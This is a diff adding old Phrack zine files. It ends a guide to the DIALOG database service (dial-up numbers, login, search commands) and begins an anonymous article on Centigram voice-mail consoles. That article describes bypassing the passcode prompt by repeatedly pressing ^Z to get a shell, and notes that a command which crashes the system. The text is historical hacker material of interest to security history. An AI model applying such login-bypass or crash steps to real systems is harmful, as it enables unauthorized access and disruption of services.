+     Boston.....................................(617)439-7920
+     Lexington..................................(617)862-6240
+
+     MICHIGAN
+     Ann Arbor..................................(313)973-2622
+     Detroit....................................(313)964-1309
+
+     MINNESOTA
+     Minneapolis................................(612)338-0676
+
+     MISSOURI
+     St. Louis..................................(314)731-0122
+
+     NEW JERSEY
+     Lyndhurst..................................(201)460-8868
+     Morristown.................................(201)292-9646
+     Newark.....................................(201)824-1412
+     Piscataway.................................(201)562-9680
+     Princeton..................................(609)243-9550
+
+     NEW MEXICO
+     Albuquerque................................(505)764-9281
+
+     NEW YORK
+     Albany.....................................(518)458-8710
+     Buffalo....................................(716)896-9440
+     Hempstead..................................(516)489-6868
+     New York City..............................(212)422-0410
+     Rochester..................................(716)458-7300
+     White Plains...............................(914)328-7810
+
+     NORTH CAROLINA
+     Research Triangle..........................(919)549-9290
+
+     OHIO
+     Cincinnati.................................(513)489-3980
+     Cleveland..................................(216)621-3807
+     Columbus...................................(614)461-8348
+     Dayton.....................................(513)898-8878
+
+     OREGON
+     Portland...................................(503)228-2771
+
+     PENNSYLVANIA
+     Allentown..................................(215)776-2030
+     Philadelphia...............................(215)923-5214
+     Pittsburg..................................(412)471-1421
+     Valley Forge/Norristown....................(215)666-1500
+
+     TEXAS
+     Austin.....................................(512)462-9494
+     Dallas.....................................(214)631-9861
+     Houston....................................(713)531-0505
+
+     UTAH
+     Salt Lake City.............................(801)532-3071
+
+     VIRGINIA
+     Fairfax....................................(703)359-2500
+
+     WASHINGTON
+     Seattle....................................(206)282-5009
+
+     WISCONSIN
+     Milwaukee..................................(414)796-1785
+
+
+                       Access to Dialog Outside of the US
+
+     Foreign readers may access Dialog via the INFONET PDN.  The following
+numbers are for those particular users.
+
+     BELGIUM
+     Brussels (300).............................(02)648-0710
+     Brussels (1200)............................(02)640-4993
+
+     DENMARK
+     Copenhagen (300)...........................(01)22-10-66
+     Copenhagen (1200)..........................(01)22-41-22
+                  Logging in to DIALOG or KNOWLEDGE INDEX (KI)
+
+     After dialing the appropriate number and establishing the connection, you
+must allow a 10-second delay and then enter the letter A (or a carriage return
+or another terminal identifier from the table below) before any further
+response will occur.  Then, follow the remainder of the procedures show below.
+
+DIALOG Information Services' DIALNET
+-2151:01-012-
+Enter Service: dialog                     Enter DIALOG or KI;
+
+DIALNET: call connected
+DIALOG INFORMATION SERVICES
+PLEASE LOGON:
+?XXXXXXXX                                 Enter User Number
+
+ENTER PASSWORD:
+?XXXXXXXX                                 Enter Password;
+
+
+NOTE:  I have researched the method of user number and password distribution
+       and all user numbers and passwords are generated by Dialog, BUT upon
+       receiving a password from DIALOG you may opt to change it.  The
+       passwords issued from DIALOG are 8 digits long, consisting of random
+       alpha-numeric characters.
+
+Once you are connected to your default service or file in DIALOG, you can then
+BEGIN one of the other services; for example, to access DIALMAIL, BEGIN MAIL.
+
+                  DIALNET Terminal Identifiers
+
+      Speed       Identifier       Terminal Type      Effect
+ =---------------------------------------------------------------=
+     300 bps      ENTER key       PCs & CRTs       Same as A
+                      E          Thermal Printers   Slower
+                      C          Impact Printers     Slowest
+                      G          Belt Printer        Slower
+
+    1200 bps      ENTER key       PCs & CRTs       Same as A
+       or             G          Matrix Printers     Slower
+    2400 bps          I          Belt Printers       Slowest
+
+- For access in half duplex, enter a < CTRL H > after the "Enter Service:"
+  prompt and before entering the word "dialog" or "ki."
+
+- Don't hit backspace if you make an error in typing "dialog" or "ki."  The
+  result will be toggling your duplex, reason being your backspace is usually
+  configured to send a < CTRL H > to delete to the left of the cursor one
+  space.
+
+                                DIALNET Messages
+
+  Message                  Probable Cause       User Action
+
+  ERROR, RE-ENTER SERVICE  Incorrect host name  Check typing
+
+  ALL PORTS BUSY           All DIALOG ports     Try in a few min.
+                           are temporarily in
+                           use.
+
+  HOST DOWN                DIALOG computer is   Try in a few min.
+                           not available.
+
+  HOST NOT RESPONDING      DIALOG Computer      Try in a few min.
+                           difficulty
+
+  CIRCUITS BUSY            DIALNET Network is   Try in a few min.
+                           temporarily busy.
+
+  DIALNET: CALL CLEARED    Appears after LOGOFF
+    BY REQUEST             to indicate connection
+  ENTER SERVICE:           to DIALOG is broken.
+
+  DROPPED BY HOST SYSTEM   Indicates a system failure
+                           at DIALOG.
+
+
+                              Navigating in DIALOG
+
+
+ To begin a search, one would enter:
+
+              BEGIN xxxx
+
+xxxx would be the database file number.  All databases found on DIALOG are
+assigned file numbers.  The searching protocol used to manipulate DIALOG seems
+at times to be a language in itself, but it can be easily learned and mastered.
+
+
+                                DIALOG HOMEBASE
+
+     I would advise the first-timer to jump into the DIALOG Homebase Menu,
+which provides information, help, file of the month, database info and rates,
+the DIALINDEX, DIALOG Training, and announcements.  DIALOG also provides
+subscribers with special services which include dialouts for certain area
+codes.  You can begin the DIALOG HOMBASE by typing:
+
+              BEGIN HOME
+
+=-**************************************************************-=
+
+
+                       DIALOG DATABASES
+
+ File Number  Database
+     15       ABI/INFORM
+    180       Academic American Encyclopedia
+     43       ADTRACT
+    108       Aerospace Database
+ 10,110       AGRICOLA
+      9       AIM/ARM
+     38       America:History & Life
+    236       American Men & Women of Science
+258,259       AP NEWS
+     45       APTIC
+    112       Aquaculture
+    116       Aqualine
+     44       Aquatic Science & Fisheries ABS
+     56       Art Bibliographies, Modern
+    192       Arthur D. Little On-Line
+    102       ASI
+    285       BIOBUSINESS
+287,288       Biography Master Index
+  5, 55
+    255       BIOSIS Previews
+    175       BLS Consumer Price Index
+    178       BLS Employment, Hours, and Earnings
+    176       BLS Producer Price Index
+    137       Book Review Index
+    470       Books In Print
+    256       Business Software Database
+308-311
+    320       CA Search
+     50       CAB Abstracts
+    262       Canadian Business and Current Affairs
+    162       Career Placement Registry/ Experienced Personnel
+    163       Career Placement Reg/Student
+    580       CENDATA
+    138       Chemical Exposure
+     19       Chemical Industry Notes
+    174       Chem Regulations & Guidelines
+300,301       CHEMNAME, CHEMSIS
+328-331       CHEMZERO
+     30       CHEMSEARCH
+     64       Chile Abuse & Neglect
+    410       Chronolog Newsletter-International Edition
+    101       Compuserve Information Service
+220-222       CLAIMS Citation
+    124       CLAIMS Class
+    242       CLAIMS Compound Registry
+23-25,125
+223-225       CLAIMS US Patents
+    123       CLAIMS Reassignment & Re-examination
+    219       Clinical Abstracts
+    164       Coffeeline
+194-195       Commerce Business Daily
+    593       Compare Products
+      8       Compendex
+    275       The Computer Database
+     77       Conference Papers Index
+    135       Congressional Record Abstracts
+    271       Consumer Drug Info Fulltext
+    171       Criminal Justice Period Index
+     60       CRIS/USDA
+    230       DATABASE OF DATABASES
+    516       D&B - Dun's Market Identifiers
+    517       D&B - Million Dollar Directory
+    518       D&B - International Dun's Market Identifiers
+    411       DIALINDEX
+    200       DIALOG PUBLICATIONS
+    100       Disclosure II
+    540       Disclosure Spectrum Ownership
+     35       Dissertation Abstracts On-Line
+103,104       DOE Energy
+    575       Donnelley Demographics
+    229       Drug Information Fulltext
+    139       Economic Literature Index
+    165       Ei Engineering Meetings
+    241       Electric Power Database
+    511       Electronic Dictionary of Education
+    507       Construction Directory
+    501       Financial Services Directory
+    510       Manufactures Directory
+    502       Professionals Directory
+504-506       Retailers Directory
+508,509       Services Directory
+    503       Wholesalers Directory
+    500       Electronic Yellow Pages Index
+ 72, 73       EMBASE (Excerpta Medica)
+172,173       EMBASE
+    114       Encyclopedia of Associations
+     69       Energyline
+    169       Energynet
+     40       ENVIROLINE
+     68       Environmental Bibliography
+      1       eric
+     54       Exceptional Child Education Resources
+    291       Family Resources
+     20       Federal Index
+    136       Federal Register Abstracts
+    265       Federal Research in Progress
+    196       Find/SVP Reports and studies Index
+    268       FINIS: Financial Industry Information Service
+     96       Fluidex
+     51       Food Science & Technology Abstracts
+     79       Foods Adlibra
+     90       Foreign Trade & Econ Abstracts
+    105       Foreign Traders Index
+     26       Foundation Directory
+     27       Foundation Grants Index
+     58       Geoarchive
+     89       Georef
+     66       GPO Monthly Catalog
+    166       GPO Publications Reference File
+     85       Grants
+    122       Harvard Business Review
+    151       Health Planning And Administration
+     39       Historical Abstracts
+    561       ICC British Company Directory
+    562       ICC British Financial Datasheets
+    189       Industry Data Sources
+    202       Information Science Abstracts
+ 12, 13       INSPEC
+    168       Insurance Abstracts
+    209       International Listing Service
+     74       International Pharmaceutical Abstracts
+    545       Investext
+    284       IRS TAXiNFO
+     14       ISMEC
+    244       LABORLAW
+     36       Language & Language Behavior Abstracts
+426-427       LC MARC
+    150       Legal Resource Index
+     76       Life Sciences Collection
+     61       LISA
+    647       Magazine ASAP
+     47       Magazine Index
+     75       Management Contents
+    234       Marquis Who's Who
+    235       Marquis Pro-files
+    239       Mathfile
+    546       Media General Database
+152-154       MEDLINE
+     86       Mental Health Abstracts
+    232       Menu The International Software Database
+     32       METADEX
+     29       Meteor/Geoastrophysical Abstracts
+    233       Microcomputer Index
+     32       MERADEX
+     29       Meteor/Geoastrophysical Abstracts
+    233       Microcomputer Index
+    248       The Middle East: Abstracts and Index
+    249       Mideast File
+     71       MLA Bibliography
+    555       Moody's Corporate Profiles
+    557       Moody's Corporate News-International
+    556       Moody's Corporate News - U.S.
+     78       National Foundations
+    111       National Newspaper News - U.S.
+     21       NCJRS
+    211       Newsearch
+     46       NICEM
+     70       NICSEM/NIMIS
+    118       Nonferrous Metals Abstracts
+      6       NTIS
+    218       Nursing & Allied Health
+    161       Occupational Safety and Health
+     28       Oceanic Abstracts
+    170       ON-LINE Chronicle
+    215       ONTAP ABI/INFORM
+    205       ONTAP BIOSIS Previews
+    204       ONTAP CA SEARCH
+    250       ONTAP CAB Abstracts
+    231       ONTAP Chemname
+    208       ONTAP Compendex
+    290       ONTAP DIALINDEX
+    201       ONTAP ERIC
+    272       ONTAP Embase
+    213       ONTAP Inspec
+    247       ONTAP Magazine Index
+    254       ONTAP Medline
+    216       ONTAP PTS Promt
+    294       ONTAP Scisearch
+    207       ONTAP Social Scisearch
+    296       ONTAP Trademarkscan
+    280       ONTAP World Patents Index
+     49       PAIS International
+    240       Paperchem
+    243       PATLAW
+    257       P/E News
+    241       Peterson's College Database
+     42       Pharmaceutical News Index
+     57       Philosopher's Index
+     41       Pollution Abstracts
+     91       Population Bibliography
+    140       PsycALERT
+     11       PsycINFO
+     17       PTS Annual Reports Abstracts
+     80       PTS Defense Markets and Technology
+     18       PTS F&S Indexes 80-
+     98       PTS F&S Indexes 72-79
+ 81, 83       PTS Forecasts
+    570       PTS MARS
+     16       PTS PROMPT
+ 82, 84       PTS TIME SERIES
+    190       Religion Index
+421-425       TEMARC
+     97       Rilm Abstracts
+ 34, 87       SciSearch
+94, 186       SciSearch
+      7       Social Scisearch
+    270       Soviet Science and Technology
+     37       Sociological Abstracts
+     62       SPIN
+     65       SSIE Current Research
+    132       Standard & Poor's News
+    133       Standard & Poor's Corporate Descriptions
+    526       Standard & Poor's Register-Biographical
+    527       Standard & Poor's Register-Corporate
+    113       Standards & Specifications
+    238       Telgen
+    119       Textile Technology Digest
+    535       Thomas Tegister On-Line
+    648       Trade & Industry ASAP
+    148       Trade & Industry Index
+106,107       Trade Opportunities
+    226       Trademarkscan
+    531       Trinet Establishment Database
+    532       Trinet Company Database
+     63       TRIS
+     52       TSCA Initial Inventory
+    480       Ulrich's International Periodicals Directory
+260,261       UPI NEWS
+    126       U.S. Exports
+     93       U.S. Political Science Documents
+    120       U.S. Public School Directory
+    184       Washington Post Index
+    117       Water Resources Abstracts
+350,351       World Patents Index
+     67       World Textiles
+    185       Zoological Record
+
+
+     Before I continue describing the various methods of searching, DIALOG has
+an on-line master index to the DIALOG databases, DIALINDEX (file 411).  It is a
+collection of the file indexes of most DIALOG databases (menu-driven databases
+cannot be searched in DIALINDEX).  DIALINDEX can be used to determine the
+number of relevant records for a single query in a collection of files.  The
+query can be a single term, a multiple-word phrase, a prefix-coded field, or a
+full logical expression of up to 240 characters.  Nested terminology, proximity
+operators, and truncated terms may also be used.
+
+     You can set the files you want searched by using the SET FILE command.
+Like this:
+
+              BEGIN 411 (return)
+
+              SET FILE ALLNEWS (if you want the latest news on
+                    or          hack/phreak busts)
+              SF ALLNEWS
+
+  To scan all Subjects:  SET FILES ALL
+
+  To scan specific categories:
+                   All Science:   (ALLSCIENCE)
+                                  - Agriculture & Nutrition
+                                  - Chemistry
+                                  - Computer Technology
+                                  - Energy & Environment
+                                  - Medicine & Biosciences
+                                  - Patents & Trademarks
+                                  - Science & technology
+                   All Business:  (ALLBUSINESS)
+                                  - Business Information
+                                  - Company Information
+                                  - Industry Analysis
+                                  - News
+                                  - Patents & Trademarks
+    All News and Current Events:  (ALLNEWS)
+                                  - News
+           All Law & Government:  (ALLLAW;ALLGOVERNMENT)
+                                  - Law & Government
+                                  - Patents & Trademarks
+All Social Science & Humanities:  (ALLSOCIAL;ALLHUMANITIES)
+                                  - Social Sciences & Humanities
+           All General Interest:  (ALLGENERAL)
+                                  - Popular Information
+                  All Reference:  (ALLREFERENCE)
+                                  - Books
+                                  - Reference
+                       All Text:  (ALLTEXT)
+                                  All databases containing
+                                  complete text of:
+                                  - Journal Articles
+                                  - Encyclopedias
+                                  - Newspapers
+                                  - Newswires
+                    All Sources:  (ALLSOURCE)
+                                  - Complete Text
+                                  - Directory
+                                  - Numeric Data
+       All ONTAP Training Files:  (ALLONTAPS)
+                                  - All On-Line Training And
+                                    Practice databases
+
+
+     Once you have selected a database you can now SELECT the search keyword.
+You set the flag by:
+
+SELECT term       -  Retrieves a set of records containing the term.
+                     May be used with words, prefix or suffix codes, EXPAND, or
+                     set numbers.
+
+     When defining what you are searching for you can use logical operators
+such as:
+
+     OR - puts the retrieval of all search terms into one set, eliminating
+          duplicate records.
+
+    AND - retrieves the intersection, or overlap, of the search terms:  all
+          terms must be in each record retrieved.
+
+    NOT - eliminates search term (or group of search terms) following it from
+          other search term(s).
+
+     Note:  Always enter a space on either side of a logical operator.
+
+     SELECT Examples:
+
+     SELECT (BICMOS OR CMOS) AND SRAM
+                 or
+     S (BICMOS OR CMOS) AND SRAM
+
+- This would generate something like this:
+              138 BICMOS <- records containing BICMOS only
+             1378 CMOS   <- records containing CMOS only
+              681 SRAM   <- records containing SRAM only
+       S1     203 (BICMOS OR CMOS) AND SRAM  <- this is what you
+       ^^                                       wanted.
+       || DIALOG names your select topic S1, S2... respectively as search its
+          databases to make it easier to type.  The contents of S1 are 203
+          found records containing the keywords BICMOS, CMOS, and SRAM.
+          Sometimes S1 is referred to as S(tep) 1
+
+PROXIMITY OPERATORS (Select command)
+
+ (W) Requests terms be adjacent to each other and in order
+     specified.                   -> S SOLAR(W)ENERGY
+(nW) Requests terms be within (n) words of each other and in order
+     specified.                   -> S SOLAR(3W)ENERGY
+ (N) Requests terms be adjacent but in any order.  Useful for
+     retrieving identical terms.  -> S SOLAR(N)ENERGY
+(nN) Requests terms be within (n) words of each other and in any
+     order.                       -> S SOLAR(3N)ENERGY
+ (F) Requests terms be in same field of same record, in any order.
+                                  -> S SOLAR(F)ENERGY
+ (L) Requests terms be in same descriptor unit as defined by
+     database.                    -> S SOLAR(L)ENERGY
+ (S) Requests terms be in same Subfield unit as defined by
+     database.                    -> S SOLAR(S)ENERGY
+ (C) Equivalent to logic operator AND.
+                                  -> S SOLAR(C)ENERGY
+
+PRIORITY OF EXECUTION
+
+              Proximity operator, NOT, AND, OR
+
+ Use parentheses to specify different order of execution, e.g. SELECT (SOLAR OR
+ SUN) AND (ENERGY OR HEAT).  Terms within parentheses are executed first.
+
+STOP WORDS (predefined)
+
+The following words may not be SELECTed as individual terms.  The computer will
+retrieve a set with zero results.  They may only be replaced with proximity
+operators, e.g. S GONE(2W)WIND
+
+                   AN       FOR       THE
+                   AND      FROM      TO
+                   BY       OF        WITH
+
+RESERVED WORDS AND SYMBOLS
+
+The following words and symbols must be enclosed in quotation marks whenever
+they are SELECTed as or within search terms, e.g., SELECT "OR"(W)GATE?
+
+              AND         =
+              FROM        *
+              NOT         +
+              OR          :
+              STEPS       /
+
+TRUNCATION
+
+OPEN:  any number of characters following stem.
+                                                      SS EMPLOY?
+RESTRICTED:  only one additional character following stem.
+                                                      SS HORSE? ?
+RESTRICTED:  maximum number of additional characters equal to
+             number of question marks entered.        SS UNIVERS??
+
+INTERNAL:  allows character replaced by question mark to vary. One
+           character per question mark.               SS WOM?N
+
+
+BASIC INDEX FIELD SPECIFICATION (SUFFIX CODES)
+
+Suffix codes are used to restrict retrieval to specified basic index fields of
+a record.  Specific fields and codes vary according to the database.
+
+     Abstract                            /AB
+     Descriptor                          /DE
+     Full Descriptor(single word)        /DF
+     Identifier                          /ID
+     Full Identifier(single word)        /IF
+     Title                               /TI
+     Note                                /NT
+     Section Heading                     /SH
+
+Examples:
+
+     SELECT BUDGET?/TI
+     SELECT POP(W)TOP(W)CAN?/TI,AB
+     SELECT (DOLPHIN? OR PORPOISE?)/DE/ID
+
+
+ADDITIONAL INDEXES (PREFIX CODES)
+
+Prefix codes are used to search additional indexes.  Specific fields and codes
+vary according to the database.
+
+     Author                       AU=
+     Company Name                 CO=
+     Corporate Source             CS=
+     Document Type                DT=
+     Journal Name                 JN=
+     Language                     LA=
+     Publication Year             PY=
+     Update                       UD=
+
+Examples:
+
+     SELECT AU=JOHNSON, ROBERT?
+     SELECT LA=GERMAN
+     SELECT CS=(MILAN(F)ITALY)
+
+
+RANGE SEARCHING
+
+A colon is used to indicate a range of sequential entries to be retrieved in a
+logical OR relationship.
+
+Examples:
+
+     SELECT CC=64072:64078
+     SELECT ZP=662521:62526
+
+
+LIMIT QUALIFIERS
+
+Limit qualifiers are used in SELECT statements to limit search terms or sets to
+given criteria.  Specific qualifiers vary according to database.
+
+     English language documents   /ENG
+     Major descriptor             /MAJ
+     Patents                      /PAT
+     Human subject                /HUM
+     Accession number range       /nnnnnn-nnnnnn
+
+Examples:
+
+     SELECT TRANSISTORS/ENG,PAT
+     SELECT S2/MAJ
+     SELECT (STRESS OR TENSION)/234567-999999
+
+     Well that's it for basic searching.  Now, how to view the record you have
+selected.
+
+     Note:  Indexes (prefix codes) often differ from database to
+database, often resulting in futile searches.  One way to avoid this
+is to make a trip to the local Public or University Library and look
+up the blue sheets for the database you wish to query.  Blue sheets
+are issued by dialog as a service to their users.  Blue Sheets often
+contain helpful searching techniques ere to the database you are
+interested in.  They will also contain a list of Indexes (prefix
+codes) unique to that database only.
+
+
+                             VIEWING SEARCH RESULTS
+
+
+COMMAND SUMMARY
+
+TYPE            Provides continuous on-line display of results.
+T               Specify set/format/range of items.  If Item range is specified,
+                use T to view next record.  May also be used with specific
+                accession number.
+
+ Examples:    T 12/3/1-22    <- set/format/range
+              T 8/7          <- set/format
+              T 6            <- view next.(6 in this case)
+              T 438721       <- view record 438721
+
+
+DISPLAY         Provides display of results one screen at a time.  Use
+D               PAGE for subsequent screens.
+                Specify set/format/range of items.  If range not specified, use
+                D to view next record.  May also be used with specific
+                accession number.
+
+ Examples:    D 11/6/1-44     <- set/format/range
+              D 9/5           <- set/format
+              D 7             <- view next.(7 in this case)
+              D 637372/7      <- view record 637372/format 7
+
+
+PRINT            Requests that results be printed offline and mailed.  Specify
+                 set/format/range of items.  If item range not specified up to
+                 50 records will be printed.  Use PR to print another 50.
+
+ Examples:    PR 9/5/1-44      <- print set/format/range
+              PR 6/7           <- print set/format (all)
+              PR 14            <- print 14 only
+              PR 734443/5      <- print 734443 format 5 only.
+
+
+PRINT TITLE xxx  To specify a title(xxx) to appear on PRINTs.  Title may
+                 contain up to 70 characters.  No semicolon may be used.  Must
+                 be entered in database before any other PRINT command is used.
+                 Cancelled by next BEGIN.
+
+Examples:     PR TITLE GLOBULIN
+              PR TITLE QUETZAL
+
+
+REPORT           Extracts data from specified fields and produces tabular
+                 format for on-line output only.  Specify set/range of
+                 items/fields.  May be used with SORTED set to specify order of
+                 entries in table.  Application is database-specific.
+
+
+TYPICAL FORMATS IN BIBLIOGRAPHIC FILES:
+
+ Format Number   Description
+      1          DIALOG Accession Number
+      2          Full Record except Abstract
+      3          Bibliographic Citation
+      5          Full Record
+      6          Title
+      7          Bibliographic Citation and Abstract
+      8          Title and Indexing
+
+NOTE: Again, the Formats differ from database to database.
+      See database bluesheet for specific format descriptions.
+
+
+OTHER OUTPUT-RELATED COMMANDS:
+
+PRINT CANCEL        Used alone, cancels preceding PRINT command.
+PR CANCEL           Specify PRINT Transaction Number to cancel
+PRINT-              any PRINT request entered in past two hours,
+PR-                 e.g. PRINT- P143
+
+PRINT QUERY         To view log of PRINT commands and cancellations.  Add
+PR QUERY            DETAIL to see date, time and costs.
+
+PRINT QUERY ACTIVE  To view log of PRINT commands that may still be cancelled.
+PR QUERY ACTIVE     Add DETAIL to see date, time, file and costs.
+
+SORT                Sorts set of records on-line according to parameters
+                    indicated. Varies per database.  Specify set
+                    number/range/field,sequence, e.g. SORT 4/1-55/AU,TI
+                    Sequence assumed ascending if not specified; use D to
+                    specify descending order.  SORT parameters may be added to
+                    end of PRINT command for offline sorting, e.g. PRINT
+                    9/5/ALL/SD,D
+
+SET SCREEN nn nn    Sets size of screen for video display.
+SET H nn            H (horizontal) given first in combined command.
+SET V nn            V Default is 75 characters H, 40 lines V
+
+
+LOGOFF              Disconnects user from DIALOG system.
+LOGOFF HOLD         Disconnects user from DIALOG system, holds work for 10
+                    minutes allowing RECONNECT.
+
+
+OTHER COMMANDS:
+
+DISPLAY SETS        Lists all sets formed since last BEGIN command.
+DS                  May specify range of sets, e.g. DS 10-22.
+
+EXPLAIN             Requests help messages for commands and file features.
+                    Enter ?EXPLAIN to see complete list.
+
+KEEP                Places records indicated in special set 0.  Specify
+K                   set number/records, or accession number.  Cancelled by a
+                    BEGIN command.  Also used in DIALORDER.
+
+LIMITALL            Limits all subsequent sets to criteria specified.  Varies
+                    per database.
+
+LIMITALL/ALL        Cancels previous LIMITALL command.
+
+?LIMIT n            Requests list of limit qualifiers for database n.
+
+
+SEARCH*SAVE
+
+
+SAVE                Stores strategy permanently until deleted.  Serial number
+                    begins with S.
+
+SAVE TEMP           Stores strategy for seven days; automatically deleted.
+                    Serial number begins with T.
+
+SAVE SDI            Stores strategy and PRINT command(s) until deleted.  PRINT
+                    command required.  Automatically executes strategy against
+                    each new update to database in which entered.  Serial
+                    number begins with D.
+
+MAPxx               Creates a Search*Save of data extracted for field xx of
+MAPxx TEMP          records already retrieved.
+
+MAPxx STEPS         If STEPS is used, data is formatted into separate search
+                    statements in Search*Save.
+
+
+REVIEWING SEARCH*SAVES
+
+
+RECALL nnnnn        Recalls Search*Save nnnnn, displaying all set-producing
+                    commands and comment lines, without executing the search.
+
+RECALL SAVE         Displays serial numbers of all permanent SAVEs, date
+                    entered, and number of lines.
+
+RECALL TEMP         Displays serial numbers of all temporary SAVEs, date
+                    entered, and number of lines.
+
+RECALL SDI          Displays serial numbers of all SDIs, dates entered,
+                    databases in which stored, and number of lines.
+
+
+EXECUTING SEARCH*SAVES
+
+
+EXECUTE nnnnn       Executes entire strategy.  Only last line is assigned a
+EX nnnnn            set number.
+
+EXECUTE STEPS nnnnn Executes entire strategy.  Assigns set number to each
+EXS nnnnn           search element.  Preferred form.
+
+EXECUTE nnnnn/x-y   Executes strategy nnnnn form command line x to command line
+                    y only.  STEPS may also be used:   EXS nnnnn/x-y
+
+EXECUTE nnnnn/USER a
+
+                    Executes strategy nnnnn originally entered by
+                    user a (a=user number).
+                    STEPS may also be used: EXS nnnnn/USER a
+
+EXECUTE nnnnn/x-y/USER a
+
+                    Executes strategy nnnnn from command line x to command line
+                    y, originally entered by user a.  STEPS may also be used:
+                    EXS nnnnn/x-y/USER a
+
+
+DELETING SEARCH*SAVES
+
+
+RELEASE nnnnn       Deletes search nnnnn from system.
+
+
+OTHER SEARCH*SAVE OPTIONS
+
+
+NAMING:  A three to five alphanumerical name may be specified following the
+         SAVE, SAVE TEMP, and SAVE SDI commands.
+         Example:  SAVE TEMP SOLAR
+
+COMMENTS:  An informative comment may be stored in a SEARCH*SAVE by entering an
+           asterisk in place of a command, followed by up to 240 characters of
+           "comment."  The line will be saved with any SEARCH*SAVE command, and
+           will display in RECALL of the search.
+
+           Example: * Search for R.J.Flappjack
+
+
+ON-LINE TEXT EDITOR
+
+
+Any Search*Save, with the exception of an SDI, may be edited from within any
+database.  An SDI must be edited within the database in which the SDI is to be
+stored.
+
+EDIT          To enter Editor and create new text.
+EDIT xxxxx    Pulls Search*Save xxxxx into Editor for editing.
+
+LIST          Displays text to be edited.
+L             OPTIONS:
+                LIST              LIST 30-110
+                LIST ALL          LIST 10,50,80
+LIST /data/   Locates all lines containing data.
+
+INSERT        Adds onto end of text.
+INSERT nn     Inserts line nn into text.
+I             To return to EDIT from INSERT, enter a period on a
+I nn          blank line.
+DELETE        To delete line(s) of text.
+D             OPTIONS:
+                DELETE 10-50
+                DELETE 10,30-50
+                DELETE ALL
+
+CHANGE        To change text within a line.
+C             Changes only first occurrence of old text in any given line.
+              OPTIONS:
+                CHANGE 60/old/new (where 60 is line number)
+                CHANGE 60/old//   (deletes old)
+                C 60//new         (inserts new at beginning of line)
+                C 80.old.new      (when text contains slash)
+                C /old/new        (new replaces old on all lines)
+                C 20,40/old/new   (nonsequential lines)
+                C 30-50/old/new   (range of lines)
+
+COPY          Duplicates line# TO line#
+CO            OPTIONS:
+                COPY 100 to 255
+                COPY 100-150 TO 255
+                COPY 100,130 TO 255
+
+MOVE          Move line# TO line#
+M             Options same as COPY.
+
+QUERY         Produces message giving name of file, number of lines, last line
+Q             number.
+
+RENUM         Renumbers lines by tens unless otherwise specified.
+R             OPTIONS:
+                RENUM n           (Renumbers by increments of n)
+
+QUIT          Used to leave editor ignoring session.
+
+SAVE          Used to create Search*Save strategy from edited file.
+SAVE TEMP     An SDI must include a PRINT command.
+SAVE SDI
+
+
+     Enjoy the DIALOG Information Network.  I've found it most interesting.
+This service is a MUST if you are in college or if you just love to learn as 
+uch as time permits.  It is a proven research tool used by R&D and university
+facilities around the world, as well as a refined corporate intelligence
+information gathering tool kept hidden from the general public by sheer expense
+and "pseudo-complexity."  With on-line databases like DIALOG available, there
+is no excuse (besides lack of time) for self-education.
+
+       *****************************************************************
+
+Brian Oblivion can be reached at Oblivion@ATDT.ORG.
+
+Additionally, he can be reached at Black Crawling Systems/VOiD Information
+Archives (for more information, e-mail Brian).  RDT welcomes any questions or
+comments you may have.  See you at SummerCon '92.
+_______________________________________________________________________________
diff --git a/phrack39/6.txt b/phrack39/6.txt
new file mode 100644
index 0000000..76e540c
--- /dev/null
+++ b/phrack39/6.txt
@@ -0,0 +1,854 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 6 of 13
+
+                     Centigram Voice Mail System Consoles
+            Proper Entry Procedure, Design Flaws, and Security Bugs
+
+                               by >Unknown User<
+
+*** Note from Phrack Staff:  This file was submitted to Phrack anonymously. ***
+*** The author used SMTP fake mail to send it to the Phrack e-mail address. ***
+*** Phrack cannot make any claims about the validity or the source of the   ***
+*** information found in this article.                                      ***
+
+     Due to more efficient task-handling and the desire for a more "Unix-like"
+environment, the developers at Centigram needed for certain key functions to be
+available at all times.  For instance, the ^Z key acts as the "escape" key
+(these can be remapped, if desired).  When necessary for some applications to
+use an "escape" procedure, pressing this key can, in at least a few cases,
+cause a drop to shell, or /cmds/qnxsh (possibly /cmds/sh, as well, but I'm used
+to seeing qnxsh).  If this escape procedure was invoked during, say,
+/cmds/login, the resulting drop to shell would by-pass the "Enter Passcode:"
+message.  And it does.
+
+     After calling the Centigram, normal procedure is to hit ^Z to activate the
+terminal, followed by the entry of the remote or console passcodes, and then
+proceeding with normal console activities.  However, if ^Z is continually
+depressed during the login sequence, the login program will abort and run
+/cmds/qnxsh.  The behavior may be somewhat erratic by the repeated use of the
+escape key, but when the $ prompt appears, usually, it doesn't deliberately go
+away without an "exit" command or a ^D.  Typically, a login pattern can develop
+to accommodate the erratic behavior something along the lines of:  continuously
+depress ^Z until $ prompt appears, hit return, possibly get "Enter Passcode:"
+message, hit return, and $ prompt appears again, set proper TTY setting, and
+change directory appropriately, and continue with normal console functions.
+
+Initial STTY Setting:
+
+     I've had problems with my terminal settings not being set properly during
+the above entry procedure.  I can correct this by using the "stty +echo +edit"
+command, and, for my terminal, all is restored.  The correct values for STTY
+options and keys appear to be:
+
+Options: +echo +edit +etab +ers +edel +oflow +mapcr +hangup
+ break=03h     esc=1Ah     rub=7Fh     can=18h     eot=04h      up=15h
+  down=0Ah    left=08h     ins=0Eh     del=0Bh
+
+     The keymap, of course, can be modified as desired, but the options,
+especially +edit, appear to be necessary.
+
+Disks and Directories:
+
+     The drives and directories are set up in a remotely MessDos fashion.  The
+output of a "pwd" command looks similar to "4:/".  "4:" represents the drive
+number, and "/" is the start of the directory structure, "4:/" being the root
+directory for drive 4, "3:/tmp" being the /tmp directory on drive 3, etc.
+
+     The two most important directories are 1:/cmds and 4:/cmds, which contain,
+for the most part, the program files for all of the performable commands on the
+system, excluding the commands written into the shell.  The directory 1:/cmds
+should look similar to:
+
+$ ls
+ backup        drel          ls            rm            talk
+ chattr        eo            mkdir         rmdir         tcap
+ choose        fdformat      mount         runfloppy     timer
+ clrhouse      files         p             search        tsk
+ cp            frel          pack          sh            unpack
+ date          get_boolean   patch         slay          ws
+ ddump         led           pwd           sleep         zap
+ diff          led.init      qnxsh         spatch
+ dinit         login         query         stty
+
+     This is a display of many useful commands.  chattr changes the read/write
+file attributes, cp is copy, ddump dumps disk sectors in hex & ascii, led is
+the line editor, p is the file print utility, and a variety of other things
+that you can experiment with at your own leisure.  DO NOT USE THE TALK COMMAND.
+At least, be careful if you do.  If you try to communicate with your own
+terminal, it locks communication with the shell, and upon hangup, for some
+reason, causes a major system error and system-wide reboot, which, quite
+frankly, made me say, "Oops.  I'm not doing that again" when I called to check
